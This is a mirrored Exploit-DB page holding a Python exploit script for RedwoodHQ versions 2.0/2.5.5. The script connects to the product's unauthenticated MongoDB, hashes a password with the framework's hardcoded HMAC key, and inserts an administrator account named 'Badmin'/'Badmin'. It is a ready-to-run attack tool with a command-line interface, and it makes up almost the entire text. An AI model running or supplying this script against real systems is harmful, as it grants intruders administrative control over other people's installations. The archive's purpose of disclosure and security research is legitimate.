bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/multiple/webapps/46992.py
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

78 lines
No EOL
2.5 KiB
Python
Executable file
Raw Blame History

# -*- encoding: utf-8 -*-
#!/usr/bin/python3
# Exploit Title: RedxploitHQ (Create Admin User by missing authentication on db)
# Date: 14-june-2019
# Exploit Author: EthicalHCOP
# Version: 2.0 / 2.5.5
# Vendor Homepage: https://redwoodhq.com/
# Software Link: https://redwoodhq.com/redwood-download/
# Tested on: Ubuntu and Windows.
# Twitter: @EthicalHcop
# Usage: python3 RedxploitHQ.py -H mongo_host -P mongo_port
# Description: Use RedxploitHQ to create a new Admin user into redwoodhq and get all the functions on the framework
#
# RedwoodHQ doesn't require that MongoDB is installed on the machine because this tool have her own Mongo Launcher.
# The problem is that this vendor database doesn't require any authentication to read her data.
# So, I use the same syntax that use the Framework to create my admin user on the database and access into the tool
#
# POC: https://youtu.be/MK9AvoJDtxY
import hashlib
import hmac
import optparse
from pymongo import MongoClient
def CreateHMAC(Pass):
message = bytes(Pass,encoding='utf8')
secret = bytes('redwood',encoding='utf8')
hash = hmac.new(secret, message, hashlib.md5)
return (hash.hexdigest())
def DbConnect(ip,port):
uri = "mongodb://" + ip + ":" + port + "/"
con = MongoClient(uri)
return con
def DbDisconnect(con):
con.close()
def CreateBadminUser(ip, port, user, passw):
con = DbConnect(ip, port)
db = con.automationframework
usr = db.users
passw = CreateHMAC(passw)
data = {
"name": user,
"password": passw,
"tag": [],
"role": "Admin",
"username": user,
"status": ""
}
usr.insert_one(data)
DbDisconnect(con)
def start():
parser = optparse.OptionParser('usage %prog ' + \
'-H host -P port')
parser.add_option('-P', '--Port', dest='port', type='string', \
help='MongoDB Port')
parser.add_option('-H', '--Host', dest='host', type='string', \
help='MongoDB Host')
(options, args) = parser.parse_args()
ip = options.host
port = options.port
if (str(ip) == "None"):
print("Insert Host")
exit(0)
if (str(port) == "None"):
port = "27017"
try:
CreateBadminUser(str(ip), str(port), 'Badmin', 'Badmin')
print("[+] New user 'Badmin'/'Badmin' created.")
except Exception as e:
print("[-] Can't create the 'Badmin'/'Badmin' user. Error: "+str(e))
if __name__ == '__main__':
start()
Reference in a new issue View git blame Copy permalink